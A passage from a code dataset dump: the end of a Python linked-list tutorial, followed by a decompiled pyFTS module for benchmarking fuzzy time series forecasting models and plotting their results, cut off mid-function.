new_node.next = prev_node.next\n\n # 5. make next of prev_node as new_node\n prev_node.next = new_node\n\n\n # This function is defined in Linked List class\n # Appends a new node at the end. This method is\n # defined inside LinkedList class shown above */\n def append(self, new_data):\n\n # 1. Create a new node\n # 2. Put in the data\n # 3. Set next as None\n new_node = Node(new_data)\n\n # 4. If the Linked List is empty, then make the new node as head\n if self.head is None:\n self.head = new_node\n return\n\n # 5. Else traverse till the last node\n last = self.head\n while (last.next):\n last = last.next\n\n # 6. Change the next of last node\n last.next = new_node\n\n def getCount(self):\n temp = self.head\n count = 0\n\n while (temp):\n count += 1\n temp = temp.next\n return count\n\n # Given a reference to the head of a list and a key,\n # delete the first occurence of key in linked list\n def deleteNode(self, key):\n\n # Store head node\n temp = self.head\n\n # If head node itself holds the key to be deleted\n if (temp is not None):\n if (temp.data == key):\n self.head = temp.next\n temp = None\n return\n\n # Search for the key to be deleted, keep track of the\n # previous node as we need to change 'prev.next'\n while(temp is not None):\n if temp.data == key:\n break\n prev = temp\n temp = temp.next\n\n # if key was not present in linked list\n if(temp == None):\n return\n\n # Unlink the node from linked list\n prev.next = temp.next\n\n temp = None\n\n # Given a reference to the head of a list\n # and a position, delete the node at a given position\n def deleteNodeAtPosition(self, position):\n\n # If linked list is empty\n if self.head == None:\n return\n\n # Store head node\n temp = self.head\n\n # If head needs to be removed\n if position == 0:\n self.head = temp.next\n temp = None\n return\n\n # Find previous node of the node to be deleted\n for i in range(position -1 ):\n temp = temp.next\n if temp is None:\n break\n\n # If position is more than number of nodes\n if temp is None:\n return\n if temp.next is None:\n return\n\n # Node temp.next is the node to be deleted\n # store pointer to the next of node to be deleted\n next = temp.next.next\n\n # Unlink the node from linked list\n temp.next = None\n temp.next = next\n\n # Utility function to print the linked list\n def printList(self):\n temp = self.head\n while (temp):\n print (temp.data),\n temp = temp.next\n\n\n\nif __name__=='__main__':\n\n # Start with the empty list\n llist = LinkedList()\n\n llist.append(6)\n llist.push(7);\n llist.push(1);\n llist.append(4)\n llist.insertAfter(llist.head.next, 8)\n\n print(\"Created linked list is:\")\n llist.printList()\n print(\"the length of this LL is: \", llist.getCount())\n\n llist.deleteNode(7)\n print (\"\\nLinked List after Deletion of 7:\")\n llist.printList()\n llist.deleteNodeAtPosition(2)\n print (\"\\nLinked List after Deletion of the node in position 2:\")\n llist.printList()\n","sub_path":"Data_Structures/python/Linked_lists/Linked_lists.py","file_name":"Linked_lists.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274150584","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /usr/local/lib/python3.6/dist-packages/pyFTS/benchmarks/benchmarks.py\n# Compiled at: 2019-03-25 15:02:05\n# Size of source mod 2**32: 40398 bytes\n__doc__ = 'Benchmarks methods for FTS methods'\nimport datetime, time\nfrom copy import deepcopy\nimport traceback, matplotlib as plt, matplotlib.pyplot as plt, numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom pyFTS.common import Transformations\nfrom pyFTS.models import song, chen, yu, ismailefendi, sadaei, hofts, pwfts, ifts, cheng, hwang\nfrom pyFTS.models.multivariate import mvfts, wmvfts, cmvfts\nfrom pyFTS.models.ensemble import ensemble\nfrom pyFTS.benchmarks import Measures, naive, arima, ResidualAnalysis, quantreg, knn\nfrom pyFTS.benchmarks import Util as bUtil\nfrom pyFTS.common import Util as cUtil\nfrom pyFTS.partitioners import Grid\ncolors = [\n 'grey', 'darkgrey', 'rosybrown', 'maroon', 'red', 'orange', 'gold', 'yellow', 'olive', 'green',\n 'darkgreen', 'cyan', 'lightblue', 'blue', 'darkblue', 'purple', 'darkviolet']\nncol = len(colors)\nstyles = [\n '-', '--', '-.', ':', '.']\nnsty = len(styles)\n\ndef __pop(key, default, kwargs):\n if key in kwargs:\n return kwargs.pop(key)\n else:\n return default\n\n\ndef get_benchmark_point_methods():\n \"\"\"Return all non FTS methods for point forecasting\"\"\"\n return [\n naive.Naive, arima.ARIMA, quantreg.QuantileRegression]\n\n\ndef get_point_methods():\n \"\"\"Return all FTS methods for point forecasting\"\"\"\n return [\n song.ConventionalFTS, chen.ConventionalFTS, yu.WeightedFTS, ismailefendi.ImprovedWeightedFTS,\n cheng.TrendWeightedFTS, sadaei.ExponentialyWeightedFTS,\n hofts.HighOrderFTS, hofts.WeightedHighOrderFTS, hwang.HighOrderFTS,\n pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_point_multivariate_methods():\n \"\"\"Return all multivariate FTS methods por point forecasting\"\"\"\n return [\n mvfts.MVFTS, wmvfts.WeightedMVFTS, cmvfts.ClusteredMVFTS]\n\n\ndef get_benchmark_interval_methods():\n \"\"\"Return all non FTS methods for point_to_interval forecasting\"\"\"\n return [\n arima.ARIMA, quantreg.QuantileRegression]\n\n\ndef get_interval_methods():\n \"\"\"Return all FTS methods for point_to_interval forecasting\"\"\"\n return [\n ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_probabilistic_methods():\n \"\"\"Return all FTS methods for probabilistic forecasting\"\"\"\n return [\n ensemble.AllMethodEnsembleFTS, pwfts.ProbabilisticWeightedFTS]\n\n\ndef get_benchmark_probabilistic_methods():\n \"\"\"Return all FTS methods for probabilistic forecasting\"\"\"\n return [\n arima.ARIMA, quantreg.QuantileRegression, knn.KNearestNeighbors]\n\n\ndef sliding_window_benchmarks(data, windowsize, train=0.8, **kwargs):\n \"\"\"\n Sliding window benchmarks for FTS forecasters.\n\n For each data window, a train and test datasets will be splitted. For each train split, number of\n partitions and partitioning method will be created a partitioner model. And for each partitioner, order,\n steps ahead and FTS method a foreasting model will be trained.\n\n Then all trained models are benchmarked on the test data and the metrics are stored on a sqlite3 database\n (identified by the 'file' parameter) for posterior analysis.\n\n All these process can be distributed on a dispy cluster, setting the atributed 'distributed' to true and\n informing the list of dispy nodes on 'nodes' parameter.\n\n The number of experiments is determined by 'windowsize' and 'inc' parameters.\n\n :param data: test data\n :param windowsize: size of sliding window\n :param train: percentual of sliding window data used to train the models\n :param kwargs: dict, optional arguments\n\n :keyword benchmark_methods: a list with Non FTS models to benchmark. The default is None.\n :keyword benchmark_methods_parameters: a list with Non FTS models parameters. The default is None.\n :keyword benchmark_models: A boolean value indicating if external FTS methods will be used on benchmark. The default is False.\n :keyword build_methods: A boolean value indicating if the default FTS methods will be used on benchmark. The default is True.\n :keyword dataset: the dataset name to identify the current set of benchmarks results on database.\n :keyword distributed: A boolean value indicating if the forecasting procedure will be distributed in a dispy cluster. . The default is False\n :keyword file: file path to save the results. The default is benchmarks.db.\n :keyword inc: a float on interval [0,1] indicating the percentage of the windowsize to move the window\n :keyword methods: a list with FTS class names. The default depends on the forecasting type and contains the list of all FTS methods.\n :keyword models: a list with prebuilt FTS objects. The default is None.\n :keyword nodes: a list with the dispy cluster nodes addresses. The default is [127.0.0.1].\n :keyword orders: a list with orders of the models (for high order models). The default is [1,2,3].\n :keyword partitions: a list with the numbers of partitions on the Universe of Discourse. The default is [10].\n :keyword partitioners_models: a list with prebuilt Universe of Discourse partitioners objects. The default is None.\n :keyword partitioners_methods: a list with Universe of Discourse partitioners class names. The default is [partitioners.Grid.GridPartitioner].\n :keyword progress: If true a progress bar will be displayed during the benchmarks. The default is False.\n :keyword start: in the multi step forecasting, the index of the data where to start forecasting. The default is 0.\n :keyword steps_ahead: a list with the forecasting horizons, i. e., the number of steps ahead to forecast. The default is 1.\n :keyword tag: a name to identify the current set of benchmarks results on database.\n :keyword type: the forecasting type, one of these values: point(default), interval or distribution. The default is point.\n :keyword transformations: a list with data transformations do apply . The default is [None].\n \"\"\"\n tag = __pop('tag', None, kwargs)\n dataset = __pop('dataset', None, kwargs)\n distributed = __pop('distributed', False, kwargs)\n transformations = kwargs.get('transformations', [None])\n progress = kwargs.get('progress', None)\n type = kwargs.get('type', 'point')\n orders = __pop('orders', [1, 2, 3], kwargs)\n partitioners_models = __pop('partitioners_models', None, kwargs)\n partitioners_methods = __pop('partitioners_methods', [Grid.GridPartitioner], kwargs)\n partitions = __pop('partitions', [10], kwargs)\n steps_ahead = __pop('steps_ahead', [1], kwargs)\n methods = __pop('methods', None, kwargs)\n models = __pop('models', None, kwargs)\n pool = [] if models is None else models\n if methods is None:\n if type == 'point':\n methods = get_point_methods()\n else:\n if type == 'interval':\n methods = get_interval_methods()\n elif type == 'distribution':\n methods = get_probabilistic_methods()\n build_methods = __pop('build_methods', True, kwargs)\n if build_methods:\n for method in methods:\n mfts = method()\n if mfts.is_high_order:\n for order in orders:\n if order >= mfts.min_order:\n mfts = method()\n mfts.order = order\n pool.append(mfts)\n\n else:\n mfts.order = 1\n pool.append(mfts)\n\n else:\n benchmark_models = __pop('benchmark_models', False, kwargs)\n if benchmark_models != False:\n benchmark_methods = __pop('benchmark_methods', None, kwargs)\n benchmark_methods_parameters = __pop('benchmark_methods_parameters', None, kwargs)\n benchmark_pool = [] if benchmark_models is None or not isinstance(benchmark_models, list) else benchmark_models\n if benchmark_models is None:\n if benchmark_methods is None:\n if type == 'point' or type == 'partition':\n benchmark_methods = get_benchmark_point_methods()\n else:\n if type == 'interval':\n benchmark_methods = get_benchmark_interval_methods()\n elif type == 'distribution':\n benchmark_methods = get_benchmark_probabilistic_methods()\n if benchmark_methods is not None:\n for transformation in transformations:\n for count, model in enumerate(benchmark_methods, start=0):\n par = benchmark_methods_parameters[count]\n mfts = model(**par)\n mfts.append_transformation(transformation)\n benchmark_pool.append(mfts)\n\n if type == 'point':\n experiment_method = run_point\n synthesis_method = process_point_jobs\n else:\n if type == 'interval':\n experiment_method = run_interval\n synthesis_method = process_interval_jobs\n else:\n if type == 'distribution':\n experiment_method = run_probabilistic\n synthesis_method = process_probabilistic_jobs\n else:\n raise ValueError('Type parameter has a unkown value!')\n if distributed:\n import pyFTS.distributed.dispy as dispy\n nodes = kwargs.get('nodes', ['127.0.0.1'])\n cluster, http_server = dispy.start_dispy_cluster(experiment_method, nodes)\n jobs = []\n inc = __pop('inc', 0.1, kwargs)\n if progress:\n from tqdm import tqdm\n _tdata = len(data) / (windowsize * inc)\n _tasks = len(partitioners_models) * len(orders) * len(partitions) * len(transformations) * len(steps_ahead)\n _tbcmk = len(benchmark_pool) * len(steps_ahead)\n progressbar = tqdm(total=(_tdata * _tasks + _tdata * _tbcmk), desc='Benchmarks:')\n file = kwargs.get('file', 'benchmarks.db')\n conn = bUtil.open_benchmark_db(file)\n for ct, train, test in (cUtil.sliding_window)(data, windowsize, train, inc=inc, **kwargs):\n if benchmark_models != False:\n for model in benchmark_pool:\n for step in steps_ahead:\n kwargs['steps_ahead'] = step\n if not distributed:\n if progress:\n progressbar.update(1)\n try:\n job = experiment_method((deepcopy(model)), None, train, test, **kwargs)\n synthesis_method(dataset, tag, job, conn)\n except Exception as ex:\n print('EXCEPTION! ', model.shortname, model.order)\n traceback.print_exc()\n\n else:\n job = (cluster.submit)((deepcopy(model)), None, train, test, **kwargs)\n jobs.append(job)\n\n else:\n partitioners_pool = []\n if partitioners_models is None:\n for transformation in transformations:\n for partition in partitions:\n for partitioner in partitioners_methods:\n data_train_fs = partitioner(data=train, npart=partition, transformation=transformation)\n partitioners_pool.append(data_train_fs)\n\n else:\n partitioners_pool = partitioners_models\n for step in steps_ahead:\n for partitioner in partitioners_pool:\n for _id, model in enumerate(pool, start=0):\n kwargs['steps_ahead'] = step\n if not distributed:\n if progress:\n progressbar.update(1)\n try:\n job = experiment_method((deepcopy(model)), (deepcopy(partitioner)), train, test, **kwargs)\n synthesis_method(dataset, tag, job, conn)\n except Exception as ex:\n print('EXCEPTION! ', model.shortname, model.order, partitioner.name, partitioner.partitions, str(partitioner.transformation))\n traceback.print_exc()\n\n else:\n job = (cluster.submit)((deepcopy(model)), (deepcopy(partitioner)), train, test, **kwargs)\n job.id = id\n jobs.append(job)\n\n if progress:\n progressbar.close()\n if distributed:\n for job in jobs:\n if progress:\n progressbar.update(1)\n else:\n job()\n if job.status == dispy.dispy.DispyJob.Finished and job is not None:\n tmp = job.result\n synthesis_method(dataset, tag, tmp, conn)\n else:\n print('status', job.status)\n print('result', job.result)\n print('stdout', job.stdout)\n print('stderr', job.exception)\n\n cluster.wait()\n dispy.stop_dispy_cluster(cluster, http_server)\n conn.close()\n\n\ndef run_point(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n \"\"\"\n Run the point forecasting benchmarks\n\n :param mfts: FTS model\n :param partitioner: Universe of Discourse partitioner\n :param train_data: data used to train the model\n :param test_data: ata used to test the model\n :param window_key: id of the sliding window\n :param transformation: data transformation\n :param indexer: seasonal indexer\n :return: a dictionary with the benchmark results\n \"\"\"\n import time\n from pyFTS.models import yu, chen, hofts, pwfts, ismailefendi, sadaei, song, cheng, hwang\n from pyFTS.partitioners import Grid, Entropy, FCM\n from pyFTS.benchmarks import Measures, naive, arima, quantreg\n from pyFTS.common import Transformations\n tmp = [\n song.ConventionalFTS, chen.ConventionalFTS, yu.WeightedFTS, ismailefendi.ImprovedWeightedFTS,\n cheng.TrendWeightedFTS, sadaei.ExponentialyWeightedFTS, hofts.HighOrderFTS, hwang.HighOrderFTS,\n pwfts.ProbabilisticWeightedFTS]\n tmp2 = [\n Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n tmp4 = [\n naive.Naive, arima.ARIMA, quantreg.QuantileRegression]\n tmp3 = [\n Measures.get_point_statistics]\n tmp5 = [\n Transformations.Differential]\n indexer = kwargs.get('indexer', None)\n steps_ahead = kwargs.get('steps_ahead', 1)\n method = kwargs.get('method', None)\n if mfts.benchmark_only:\n _key = mfts.shortname + str(mfts.order if mfts.order is not None else '')\n else:\n pttr = str(partitioner.__module__).split('.')[(-1)]\n _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n mfts.partitioner = partitioner\n mfts.append_transformation(partitioner.transformation)\n _key += str(steps_ahead)\n _key += str(method) if method is not None else ''\n _start = time.time()\n (mfts.fit)(train_data, **kwargs)\n _end = time.time()\n times = _end - _start\n _start = time.time()\n _rmse, _smape, _u = (Measures.get_point_statistics)(test_data, mfts, **kwargs)\n _end = time.time()\n times += _end - _start\n ret = {'key':_key, \n 'obj':mfts, 'rmse':_rmse, 'smape':_smape, 'u':_u, 'time':times, 'window':window_key, 'steps':steps_ahead, \n 'method':method}\n return ret\n\n\ndef run_interval(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n \"\"\"\n Run the interval forecasting benchmarks\n\n :param mfts: FTS model\n :param partitioner: Universe of Discourse partitioner\n :param train_data: data used to train the model\n :param test_data: ata used to test the model\n :param window_key: id of the sliding window\n :param transformation: data transformation\n :param indexer: seasonal indexer\n :return: a dictionary with the benchmark results\n \"\"\"\n import time\n from pyFTS.models import hofts, ifts, pwfts\n from pyFTS.partitioners import Grid, Entropy, FCM\n from pyFTS.benchmarks import Measures, arima, quantreg\n tmp = [\n hofts.HighOrderFTS, ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS]\n tmp2 = [\n Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n tmp4 = [\n arima.ARIMA, quantreg.QuantileRegression]\n tmp3 = [\n Measures.get_interval_statistics]\n steps_ahead = kwargs.get('steps_ahead', 1)\n method = kwargs.get('method', None)\n if mfts.benchmark_only:\n _key = mfts.shortname + str(mfts.order if mfts.order is not None else '') + str(mfts.alpha)\n else:\n pttr = str(partitioner.__module__).split('.')[(-1)]\n _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n mfts.partitioner = partitioner\n mfts.append_transformation(partitioner.transformation)\n _key += str(steps_ahead)\n _key += str(method) if method is not None else ''\n _start = time.time()\n (mfts.fit)(train_data, **kwargs)\n _end = time.time()\n times = _end - _start\n _start = time.time()\n metrics = (Measures.get_interval_statistics)(test_data, mfts, **kwargs)\n _end = time.time()\n times += _end - _start\n ret = {'key':_key, \n 'obj':mfts, 'sharpness':metrics[0], 'resolution':metrics[1], 'coverage':metrics[2], 'time':times, \n 'Q05':metrics[3], 'Q25':metrics[4], 'Q75':metrics[5], 'Q95':metrics[6], 'winkler05':metrics[7], \n 'winkler25':metrics[8], 'window':window_key, \n 'steps':steps_ahead, 'method':method}\n return ret\n\n\ndef run_probabilistic(mfts, partitioner, train_data, test_data, window_key=None, **kwargs):\n \"\"\"\n Run the probabilistic forecasting benchmarks\n\n :param mfts: FTS model\n :param partitioner: Universe of Discourse partitioner\n :param train_data: data used to train the model\n :param test_data: ata used to test the model\n :param steps:\n :param resolution:\n :param window_key: id of the sliding window\n :param transformation: data transformation\n :param indexer: seasonal indexer\n :return: a dictionary with the benchmark results\n \"\"\"\n import time, numpy as np\n from pyFTS.models import hofts, ifts, pwfts\n from pyFTS.models.ensemble import ensemble\n from pyFTS.partitioners import Grid, Entropy, FCM\n from pyFTS.benchmarks import Measures, arima, quantreg, knn\n from pyFTS.models.seasonal import SeasonalIndexer\n tmp = [\n hofts.HighOrderFTS, ifts.IntervalFTS, pwfts.ProbabilisticWeightedFTS, arima.ARIMA,\n ensemble.AllMethodEnsembleFTS, knn.KNearestNeighbors]\n tmp2 = [\n Grid.GridPartitioner, Entropy.EntropyPartitioner, FCM.FCMPartitioner]\n tmp3 = [\n Measures.get_distribution_statistics, SeasonalIndexer.SeasonalIndexer, SeasonalIndexer.LinearSeasonalIndexer]\n indexer = kwargs.get('indexer', None)\n steps_ahead = kwargs.get('steps_ahead', 1)\n method = kwargs.get('method', None)\n if mfts.benchmark_only:\n _key = mfts.shortname + str(mfts.order if mfts.order is not None else '') + str(mfts.alpha)\n else:\n pttr = str(partitioner.__module__).split('.')[(-1)]\n _key = mfts.shortname + ' n = ' + str(mfts.order) + ' ' + pttr + ' q = ' + str(partitioner.partitions)\n mfts.partitioner = partitioner\n mfts.append_transformation(partitioner.transformation)\n _key += str(steps_ahead)\n _key += str(method) if method is not None else ''\n if mfts.has_seasonality:\n mfts.indexer = indexer\n _start = time.time()\n (mfts.fit)(train_data, **kwargs)\n _end = time.time()\n times = _end - _start\n _crps1, _t1, _brier = (Measures.get_distribution_statistics)(test_data, mfts, **kwargs)\n _t1 += times\n ret = {'key':_key, \n 'obj':mfts, 'CRPS':_crps1, 'time':_t1, 'brier':_brier, 'window':window_key, 'steps':steps_ahead, \n 'method':method}\n return ret\n\n\ndef process_point_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from a dictionary with point benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'point', job)\n rmse = deepcopy(data)\n rmse.extend(['rmse', job['rmse']])\n bUtil.insert_benchmark(rmse, conn)\n smape = deepcopy(data)\n smape.extend(['smape', job['smape']])\n bUtil.insert_benchmark(smape, conn)\n u = deepcopy(data)\n u.extend(['u', job['u']])\n bUtil.insert_benchmark(u, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n\n\ndef process_interval_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from an dictionary with interval benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'interval', job)\n sharpness = deepcopy(data)\n sharpness.extend(['sharpness', job['sharpness']])\n bUtil.insert_benchmark(sharpness, conn)\n resolution = deepcopy(data)\n resolution.extend(['resolution', job['resolution']])\n bUtil.insert_benchmark(resolution, conn)\n coverage = deepcopy(data)\n coverage.extend(['coverage', job['coverage']])\n bUtil.insert_benchmark(coverage, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n Q05 = deepcopy(data)\n Q05.extend(['Q05', job['Q05']])\n bUtil.insert_benchmark(Q05, conn)\n Q25 = deepcopy(data)\n Q25.extend(['Q25', job['Q25']])\n bUtil.insert_benchmark(Q25, conn)\n Q75 = deepcopy(data)\n Q75.extend(['Q75', job['Q75']])\n bUtil.insert_benchmark(Q75, conn)\n Q95 = deepcopy(data)\n Q95.extend(['Q95', job['Q95']])\n bUtil.insert_benchmark(Q95, conn)\n W05 = deepcopy(data)\n W05.extend(['winkler05', job['winkler05']])\n bUtil.insert_benchmark(W05, conn)\n W25 = deepcopy(data)\n W25.extend(['winkler25', job['winkler25']])\n bUtil.insert_benchmark(W25, conn)\n\n\ndef process_probabilistic_jobs(dataset, tag, job, conn):\n \"\"\"\n Extract information from an dictionary with probabilistic benchmark results and save it on a database\n\n :param dataset: the benchmark dataset name\n :param tag: alias for the benchmark group being executed\n :param job: a dictionary with the benchmark results\n :param conn: a connection to a Sqlite database\n :return:\n \"\"\"\n data = bUtil.process_common_data(dataset, tag, 'density', job)\n crps = deepcopy(data)\n crps.extend(['crps', job['CRPS']])\n bUtil.insert_benchmark(crps, conn)\n time = deepcopy(data)\n time.extend(['time', job['time']])\n bUtil.insert_benchmark(time, conn)\n brier = deepcopy(data)\n brier.extend(['brier', job['brier']])\n bUtil.insert_benchmark(brier, conn)\n\n\ndef print_point_statistics(data, models, externalmodels=None, externalforecasts=None, indexers=None):\n \"\"\"\n Run point benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :param externalmodels: a list with benchmark models (façades for other methods)\n :param externalforecasts:\n :param indexers:\n :return:\n \"\"\"\n ret = \"Model\\t\\t& Order & RMSE\\t\\t& SMAPE & Theil's U\\t\\t\\\\\\\\ \\n\"\n for count, model in enumerate(models, start=0):\n _rmse, _smape, _u = Measures.get_point_statistics(data, model, indexers)\n ret += model.shortname + '\\t\\t& '\n ret += str(model.order) + '\\t\\t& '\n ret += str(_rmse) + '\\t\\t& '\n ret += str(_smape) + '\\t\\t& '\n ret += str(_u)\n ret += '\\t\\\\\\\\ \\n'\n\n if externalmodels is not None:\n l = len(externalmodels)\n for k in np.arange(0, l):\n ret += externalmodels[k] + '\\t\\t& '\n ret += ' 1\\t\\t& '\n ret += str(round(Measures.rmse(data, externalforecasts[k][:-1]), 2)) + '\\t\\t& '\n ret += str(round(Measures.smape(data, externalforecasts[k][:-1]), 2)) + '\\t\\t& '\n ret += str(round(Measures.UStatistic(data, externalforecasts[k][:-1]), 2))\n ret += '\\t\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef print_interval_statistics(original, models):\n \"\"\"\n Run interval benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :return:\n \"\"\"\n ret = 'Model\\t& Order & Sharpness\\t\\t& Resolution\\t\\t& Coverage & .05 & .25 & .75 & .95\\t\\\\\\\\ \\n'\n for fts in models:\n _sharp, _res, _cov, _q5, _q25, _q75, _q95 = Measures.get_interval_statistics(original, fts)\n ret += fts.shortname + '\\t\\t& '\n ret += str(fts.order) + '\\t\\t& '\n ret += str(_sharp) + '\\t\\t& '\n ret += str(_res) + '\\t\\t& '\n ret += str(_cov) + ' &'\n ret += str(_q5) + ' &'\n ret += str(_q25) + ' &'\n ret += str(_q75) + ' &'\n ret += str(_q95) + '\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef print_distribution_statistics(original, models, steps, resolution):\n \"\"\"\n Run probabilistic benchmarks on given models and data and print the results\n\n :param data: test data\n :param models: a list of FTS models to benchmark\n :return:\n \"\"\"\n ret = 'Model\\t& Order & Interval & Distribution\\t\\\\\\\\ \\n'\n for fts in models:\n _crps1, _crps2, _t1, _t2 = Measures.get_distribution_statistics(original, fts, steps, resolution)\n ret += fts.shortname + '\\t\\t& '\n ret += str(fts.order) + '\\t\\t& '\n ret += str(_crps1) + '\\t\\t& '\n ret += str(_crps2) + '\\t\\\\\\\\ \\n'\n\n print(ret)\n\n\ndef plot_point(axis, points, order, label, color='red', ls='-', linewidth=1):\n mi = min(points) * 0.95\n ma = max(points) * 1.05\n for k in np.arange(0, order):\n points.insert(0, None)\n\n axis.plot(points, color=color, label=label, ls=ls, linewidth=linewidth)\n return [\n mi, ma]\n\n\ndef plot_compared_series(original, models, colors, typeonlegend=False, save=False, file=None, tam=[20, 5], points=True, intervals=True, linewidth=1.5):\n \"\"\"\n Plot the forecasts of several one step ahead models, by point or by interval\n\n :param original: Original time series data (list)\n :param models: List of models to compare\n :param colors: List of models colors\n :param typeonlegend: Add the type of forecast (point / interval) on legend\n :param save: Save the picture on file\n :param file: Filename to save the picture\n :param tam: Size of the picture\n :param points: True to plot the point forecasts, False otherwise\n :param intervals: True to plot the interval forecasts, False otherwise\n :param linewidth:\n :return:\n \"\"\"\n fig = plt.figure(figsize=tam)\n ax = fig.add_subplot(111)\n mi = []\n ma = []\n legends = []\n ax.plot(original, color='black', label='Original', linewidth=(linewidth * 1.5))\n for count, fts in enumerate(models, start=0):\n try:\n if fts.has_point_forecasting and points:\n forecasts = fts.forecast(original)\n if isinstance(forecasts, np.ndarray):\n forecasts = forecasts.tolist()\n mi.append(min(forecasts) * 0.95)\n ma.append(max(forecasts) * 1.05)\n for k in np.arange(0, fts.order):\n forecasts.insert(0, None)\n\n lbl = fts.shortname + str(fts.order if (fts.is_high_order and not fts.benchmark_only) else '')\n if typeonlegend:\n lbl += ' (Point)'\n ax.plot(forecasts, color=(colors[count]), label=lbl, ls='-', linewidth=linewidth)\n else:\n if fts.has_interval_forecasting:\n if intervals:\n forecasts = fts.forecast_interval(original)\n lbl = fts.shortname + ' ' + str(fts.order if (fts.is_high_order and not fts.benchmark_only) else '')\n if not points:\n if intervals:\n ls = '-'\n else:\n ls = '--'\n tmpmi, tmpma = Util.plot_interval(ax, forecasts, (fts.order), label=lbl, typeonlegend=typeonlegend, color=(colors[count]),\n ls=ls,\n linewidth=linewidth)\n mi.append(tmpmi)\n ma.append(tmpma)\n except ValueError as ex:\n print(fts.shortname)\n\n handles0, labels0 = ax.get_legend_handles_labels()\n lgd = ax.legend(handles0, labels0, loc=2, bbox_to_anchor=(1, 1))\n legends.append(lgd)\n\n ax.set_ylim([min(mi), max(ma)])\n ax.set_ylabel('F(T)')\n ax.set_xlabel('T')\n ax.set_xlim([0, len(original)])\n\n\ndef plotCompared(original, forecasts, labels, title):\n fig = plt.figure(figsize=[13, 6])\n ax = fig.add_subplot(111)\n ax.plot(original, color='k', label='Original')\n for c in range(0, len(forecasts)):\n ax.plot((forecasts[c]), label=(labels[c]))\n\n handles0, labels0 = ax.get_legend_handles_labels()\n ax.legend(handles0, labels0)\n ax.set_title(title)\n ax.set_ylabel('F(T)')\n ax.set_xlabel('T')\n ax.set_xlim([0, len(original)])\n ax.set_ylim([min(original), max(original)])\n\n\ndef SelecaoSimples_MenorRMSE(original, parameters, modelo):\n ret = []\n errors = []\n forecasted_best = []\n print('Série Original')\n fig = plt.figure(figsize=[20, 12])\n fig.suptitle('Comparação de modelos ')\n ax0 = fig.add_axes([0, 0.5, 0.65, 0.45])\n ax0.set_xlim([0, len(original)])\n ax0.set_ylim([min(original), max(original)])\n ax0.set_title('Série Temporal')\n ax0.set_ylabel('F(T)')\n ax0.set_xlabel('T')\n ax0.plot(original, label='Original')\n min_rmse = 100000.0\n best = None\n for p in parameters:\n sets = Grid.GridPartitioner(data=original, npart=p).sets\n fts = modelo(str(p) + ' particoes')\n fts.train(original, sets=sets)\n forecasted = fts.forecast(original)\n forecasted.insert(0, original[0])\n ax0.plot(forecasted, label=(fts.name))\n error = Measures.rmse(np.array(forecasted), np.array(original))\n print(p, error)\n errors.append(error)\n if error < min_rmse:\n min_rmse = error\n best = fts\n forecasted_best = forecasted\n\n handles0, labels0 = ax0.get_legend_handles_labels()\n ax0.legend(handles0, labels0)\n ax1 = fig.add_axes([0.7, 0.5, 0.3, 0.45])\n ax1.set_title('Comparação dos Erros Quadráticos Médios')\n ax1.set_ylabel('RMSE')\n ax1.set_xlabel('Quantidade de Partições')\n ax1.set_xlim([min(parameters), max(parameters)])\n ax1.plot(parameters, errors)\n ret.append(best)\n ret.append(forecasted_best)\n print('\\nSérie Diferencial')\n difffts = Transformations.differential(original)\n errors = []\n forecastedd_best = []\n ax2 = fig.add_axes([0, 0, 0.65, 0.45])\n ax2.set_xlim([0, len(difffts)])\n ax2.set_ylim([min(difffts), max(difffts)])\n ax2.set_title('Série Temporal')\n ax2.set_ylabel('F(T)')\n ax2.set_xlabel('T')\n ax2.plot(difffts, label='Original')\n min_rmse = 100000.0\n bestd = None\n for p in parameters:\n sets = Grid.GridPartitioner(data=difffts, npart=p)\n fts = modelo(str(p) + ' particoes')\n fts.train(difffts, sets=sets)\n forecasted = fts.forecast(difffts)\n forecasted.insert(0, difffts[0])\n ax2.plot(forecasted, label=(fts.name))\n error = Measures.rmse(np.array(forecasted), np.array(difffts))\n print(p, error)\n errors.append(error)\n if error < min_rmse:\n min_rmse = error\n bestd = fts\n forecastedd_best = forecasted\n\n handles0, labels0 = ax2.get_legend_handles_labels()\n ax2.legend(handles0, labels0)\n ax3 = fig.add_axes([0.7, 0, 0.3, 0.45])\n ax3.set_title('Comparação dos Erros Quadráticos Médios')\n ax3.set_ylabel('RMSE')\n ax3.set_xlabel('Quantidade de Partições')\n ax3.set_xlim([min(parameters), max(parameters)])\n ax3.plot(parameters, errors)\n ret.append(bestd)\n ret.append(forecastedd_best)\n return ret\n\n\ndef compareModelsPlot(original, models_fo, models_ho):\n fig = 